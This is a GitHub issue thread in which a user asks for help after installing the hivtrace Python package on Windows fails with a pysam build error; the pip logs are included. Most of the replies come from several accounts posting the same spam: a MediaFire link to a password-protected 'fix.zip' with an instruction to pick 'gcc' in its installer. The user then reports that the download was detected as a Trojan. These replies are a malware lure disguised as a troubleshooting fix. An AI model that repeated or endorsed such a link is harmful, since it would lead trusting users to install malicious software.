### ISSUE TITLE
Having trouble installing HIV trace

### ISSUE THREAD

**Issue by liusu0825** [veg/hivtrace#108]
Dear Steven, hello! 
  An analysis using the HIV trace tool has recently been needed. However, I'm having some difficulties trying to install the tool and would love your help. I'm using the windows OS and have tried the following steps to install HIV trace: make sure the Python environment and related dependency libraries) are installed. I tried to install HIV trace using the pip3 command: pip3 install hivtrace but the system prompts This error originates from a subprocess, and is likely not a problem with pip. 
  I have consulted relevant documentation and online resources, but I don't seem to find a clear solution to this problem. So I hope you can provide some guidance or advice to help me solve my problem with installing HIV trace.
Attached is the error message I am getting during installation:
(.venv) PS C:\Users\10920\Desktop\代码\pythonProject> pip3 install biopython
Requirement already satisfied: biopython in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-pkages (1.84)
Requirement already satisfied: numpy in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packas (from biopython) (2.1.0)
(.venv) PS C:\Users\10920\Desktop\代码\pythonProject> pip3 install numpy
Requirement already satisfied: numpy in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packages (2.1.0)
(.venv) PS C:\Users\10920\Desktop\代码\pythonProject> pip3 install scipy
Requirement already satisfied: scipy in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packages (1.14.1)
Requirement already satisfied: numpy<2.3,>=1.23.5 in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packages (from scipy) (2.1.0)
(.venv) PS C:\Users\10920\Desktop\代码\pythonProject> pip3 install cython
Requirement already satisfied: cython in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packages (3.0.11)
(.venv) PS C:\Users\10920\Desktop\代码\pythonProject> pip3 install hivtrace
Collecting hivtrace
  Using cached hivtrace-0.8.0.tar.gz (39.8 MB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: biopython>=1.58 in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packages (from hivtrace) (1.84)
Collecting bioext>=0.21.0 (from hivtrace)
  Using cached bioext-0.21.8.tar.gz (2.3 MB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting hppy>=0.9.9 (from hivtrace)
  Using cached hppy-0.9.9.tar.gz (5.9 kB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting tornado>=4.3 (from hivtrace)
  Using cached tornado-6.4.1-cp38-abi3-win_amd64.whl.metadata (2.6 kB)
Collecting hivclustering>=1.6.8 (from hivclustering[edgefiltering]>=1.6.8->hivtrace)
  Using cached hivclustering-1.7.0-py3-none-any.whl
Requirement already satisfied: numpy>=2.0 in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packages (from bioext>=0.21.0->hivtrace) (2.1.0)
Requirement already satisfied: scipy>=0.15 in c:\users\10920\desktop\代码\pythonproject\.venv\lib\site-packages (from bioext>=0.21.0->hivtrace) (1.14.1)
Collecting pysam>=0.17 (from bioext>=0.21.0->hivtrace)
  Using cached pysam-0.22.1.tar.gz (4.6 MB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... error
  error: subprocess-exited-with-error

  × Getting requirements to build wheel did not run successfully.
  │ exit code: 1
  ╰─> [40 lines of output]
      # pysam: cython is available - using cythonize if necessary
      # pysam: htslib mode is shared
      # pysam: HTSLIB_CONFIGURE_OPTIONS=None
      '.' 不是内部或外部命令，也不是可运行的程序
      或批处理文件。
      '.' 不是内部或外部命令，也不是可运行的程序
      或批处理文件。
      # pysam: htslib configure options: None
      Traceback (most recent call last):
        File "C:\Users\10920\Desktop\代码\pythonProject\.venv\Lib\site-packages\pip\_vendor\pyproject_hooks\_in_process\_in_process.py", line 353, in <module>
          main()
        File "C:\Users\10920\Desktop\代码\pythonProject\.venv\Lib\site-packages\pip\_vendor\pyproject_hooks\_in_process\_in_process.py", line 335, in main
          json_out['return_val'] = hook(**hook_input['kwargs'])
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "C:\Users\10920\Desktop\代码\pythonProject\.venv\Lib\site-packages\pip\_vendor\pyproject_hooks\_in_process\_in_process.py", line 118, in get_requires_for_build_wheel
          return hook(config_settings)
                 ^^^^^^^^^^^^^^^^^^^^^
        File "C:\Users\10920\AppData\Local\Temp\pip-build-env-1_bkt2av\overlay\Lib\site-packages\setuptools\build_meta.py", line 332, in get_requires_for_build_wheel
          return self._get_build_requires(config_settings, requirements=[])
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "C:\Users\10920\AppData\Local\Temp\pip-build-env-1_bkt2av\overlay\Lib\site-packages\setuptools\build_meta.py", line 302, in _get_build_requires
          self.run_setup()
        File "C:\Users\10920\AppData\Local\Temp\pip-build-env-1_bkt2av\overlay\Lib\site-packages\setuptools\build_meta.py", line 502, in run_setup
          super().run_setup(setup_script=setup_script)
        File "C:\Users\10920\AppData\Local\Temp\pip-build-env-1_bkt2av\overlay\Lib\site-packages\setuptools\build_meta.py", line 318, in run_setup
          exec(code, locals())
        File "<string>", line 437, in <module>
        File "<string>", line 81, in run_make_print_config
        File "C:\Users\10920\AppData\Local\Programs\Python\Python312\Lib\subprocess.py", line 466, in check_output
          return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "C:\Users\10920\AppData\Local\Programs\Python\Python312\Lib\subprocess.py", line 548, in run
          with Popen(*popenargs, **kwargs) as process:
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "C:\Users\10920\AppData\Local\Programs\Python\Python312\Lib\subprocess.py", line 1026, in __init__
          self._execute_child(args, executable, preexec_fn, close_fds,
        File "C:\Users\10920\AppData\Local\Programs\Python\Python312\Lib\subprocess.py", line 1538, in _execute_child
          hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      FileNotFoundError: [WinError 2] 系统找不到指定的文件。
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.

Please feel free to let me know if I need to provide more information or do specific actions. Thank you so much for reading this request for help despite your busy schedule and look forward to hearing from you.
 Good wishes.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by liusu0825** [comment]
> Download 下载 https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme 密码：changeme In the installer menu, select "gcc."在安装程序菜单中，选择“gcc”。

Why does the computer recognize the Trojan horse after I download it?
